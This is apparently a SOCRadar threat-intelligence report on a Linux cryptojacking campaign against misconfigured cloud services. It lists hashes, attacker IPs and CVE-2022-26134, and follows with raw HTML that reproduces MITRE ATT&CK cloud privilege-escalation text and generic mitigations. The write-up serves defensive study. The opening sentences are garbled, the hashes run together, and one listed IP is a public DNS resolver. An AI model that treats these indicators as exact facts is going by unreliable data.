
Cyber Pandemonium Unleashed: Tracing the Trail of Sophisticated Linux Malware Campaign
The researchers' latest discovery uncovered a sophisticated Spinning Yarn malware campaign focused on misconfigured Linux servers with popular cloud services. The cryptojacking campaign involving Linux malware misconfigured Apache Hadoop, Confluence, Docker, and Redis with new and unique malicious payloads. targets examples,
Indicators of Compromise
Hashes (13)
079b726261c92055c6914a85cc23ef6d7a68fcbf64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de505b667fc6c59cbced066b3218937c16d251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7dedface8e5c9932643017bafa71eedea4ddd0ae974d5722087135833ed394f20e236d845db8c398e27afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf2de9fe975cae50c40c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe67d2a9efe93d7ce5d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6ed45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd383296b6bd1e3ddb55a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af9bc1a0937841d174e71975a72f93b134476c8183051fee827ea509b4e888e19d551a8ced6087e15c0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d6af01a948caf8b87IPv4 (4)
209.141.37.110107.189.31.17247.96.69.71114.114.114.114CVEs (1)
CVE-2022-26134Notes
<div><b>CONCLUSIONS</b></div><div>The increasing sophistication of malware campaigns targeting misconfigured Linux servers in cloud services highlights more than ever the critical need for strong cybersecurity defenses. Exploiting vulnerabilities in widely used platforms such as Apache Hadoop YARN, Docker, Confluence, and Redis, these campaigns reveal the cunning adaptability and innovation of cyber attackers. A holistic cybersecurity approach is essential to create an effective defense against such threats. This requires performing comprehensive system audits, maintaining stringent update and patch management routines, implementing state-of-the-art monitoring and logging practices, ensuring API security, and leveraging advanced security technologies that can identify and neutralize emerging threats.</div><div><br></div><div>When strengthening an organization's cybersecurity framework, it is crucial to educate staff about potential cyber threats, create effective backup and recovery mechanisms, and enforce strict access controls. Herein lies the important role of SOCRadar Labs. Our platform offers a comprehensive suite of tools and services aimed at detecting, analyzing and mitigating cyber threats. Through our comprehensive threat intelligence and analysis capabilities, SOCRadar Labs empowers our customers with early warning alerts, rigorous incident analysis, and pragmatic, actionable recommendations designed to prevent or mitigate the impacts of cyberattacks. Our platform stands as a vital ally in the ongoing battle against sophisticated malware campaigns, enabling organizations to proactively strengthen their security measures.</div><div><br></div><div>By leveraging the resources and expertise provided by SOCRadar Labs, organizations can significantly strengthen their resilience against the ever-evolving cyber threat landscape and ensure the security and availability of their cloud-based resources. The synthesis of a proactive security strategy and the strategic application of SOCRadar Labs' threat intelligence platform is the essence of navigating the complex landscape of modern cybersecurity. By staying alert, prepared, and compliant with the latest cybersecurity solutions offered by SOCRadar Labs, organizations can more effectively protect themselves from the complex and ever-evolving strategies of cyber attackers. At SOCRadar, our commitment is to enable our customers to not only respond to threats but also stay ahead of them and protect their digital environments in this ever-changing cybersecurity frontier.</div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div>
Mitigation
<span id="docs-internal-guid-b393d0f4-7fff-a3ac-6a6d-9776032395f2"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">MITIGATIONS</span></p><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;"><br></span></p><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access</span></p><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Other sub-techniques of Abuse Elevation Control Mechanism (5)</span></p><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col></colgroup><tbody><tr style="height:41.5pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Name</span></p></td></tr><tr style="height:43pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/001/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">T1548.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/001/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Setuid and Setgid</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/002/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">T1548.002</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/002/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Bypass User Account Control</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/003/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">T1548.003</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/003/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Sudo and Sudo Caching</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/004/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">T1548.004</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1548/004/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Elevated Execution with Prompt</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-right:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">T1548.005</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Temporary Elevated Cloud Access</span></p></td></tr></tbody></table></div><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.</span></p><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.[1][2]</span></p><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.[3] In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.[4]</span></p><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.[5][3]</span></p><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.[6][7]</span></p><br><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Note: this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.[8]</span></p><br><h2 style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"><span style="font-size: 17pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Mitigations</span></h2><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col><col></colgroup><tbody><tr style="height:37.75pt;"><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Mitigation</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Description</span></p></td></tr><tr style="height:70pt;"><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/mitigations/M1018"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">M1018</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/mitigations/M1018"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">User Account Management</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: rgb(255, 255, 255); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Limit the privileges of cloud accounts to assume, create, or impersonate additional roles, policies, and permissions to only those required. Where just-in-time access is enabled, consider requiring manual approval for temporary elevation of privileges.</span></p></td></tr></tbody></table></div><br><h2 style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"><span style="font-size: 17pt; font-family: Arial, sans-serif; color: rgb(57, 67, 76); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Detection</span></h2><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col><col><col></colgroup><tbody><tr style="height:37.75pt;"><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Data Source</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Data Component</span></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dee2e6 1.2000000000000002pt;border-top:solid #dfdfdf 0.6000000000000001pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Detects</span></p></td></tr><tr style="height:57pt;"><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/datasources/DS0002"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">DS0002</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/datasources/DS0002"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">User Account</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/datasources/DS0002/#User%20Account%20Modification"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">User Account Modification</span></a></p></td><td style="border-left:solid #dfdfdf 0.6000000000000001pt;border-right:solid #dfdfdf 0.6000000000000001pt;border-bottom:solid #dfdfdf 0.6000000000000001pt;border-top:solid #dee2e6 1.2000000000000002pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Log API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.</span></p></td></tr></tbody></table></div><br><br><ul style="margin-top:0;margin-bottom:0;"><li style="list-style-type: disc; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:39pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Linux malware mitigation techniques are various methods used to protect Linux systems from malicious software. Some of these techniques are:</span></p></li><ul style="margin-top:0;margin-bottom:0;"><li style="list-style-type: circle; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Using antivirus programs: There are various antivirus programs available for Linux. They can use signature-based or behavioral analysis methods to detect and clean known malicious software. </span></p></li><li style="list-style-type: circle; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Following security updates: Linux distributions regularly release updates to fix security vulnerabilities. Installing these updates is important to protect systems from potential attacks. You can install updates automatically or manually.</span></p></li><li style="list-style-type: circle; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Setting secure passwords and permissions: On Linux systems, setting secure passwords and permissions for user accounts and files is an effective method to limit the access of malicious software. It is recommended that passwords are long, complex and unique, and permissions are given only to those who need them.</span></p></li><li style="list-style-type: circle; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Not downloading files from untrusted sources: Malicious software that can harm Linux systems often infects through files downloaded from untrusted or suspicious sources. Therefore, it is necessary to be careful when downloading or running files and verify the reliability of the source.</span></p></li><li style="list-style-type: circle; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">Using tools like firewall and SELinux: On Linux systems, firewall tools can be used to control network traffic and prevent unauthorized access. For example, programs like iptables, ufw, firewalld offer firewall solutions for Linux. Also, security-enhanced Linux tools like SELinux can reduce the impact of malicious software by ensuring that files, processes and users on the system operate according to security policies.</span></p></li></ul><li style="list-style-type: disc; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(13, 13, 13); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 10pt; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">These techniques can be useful to protect Linux systems from malicious software, but they do not provide absolute protection. Therefore, Linux users should be careful and aware of malicious software by scanning, backing up and keeping their systems secure regularly.</span></p></li></ul></span>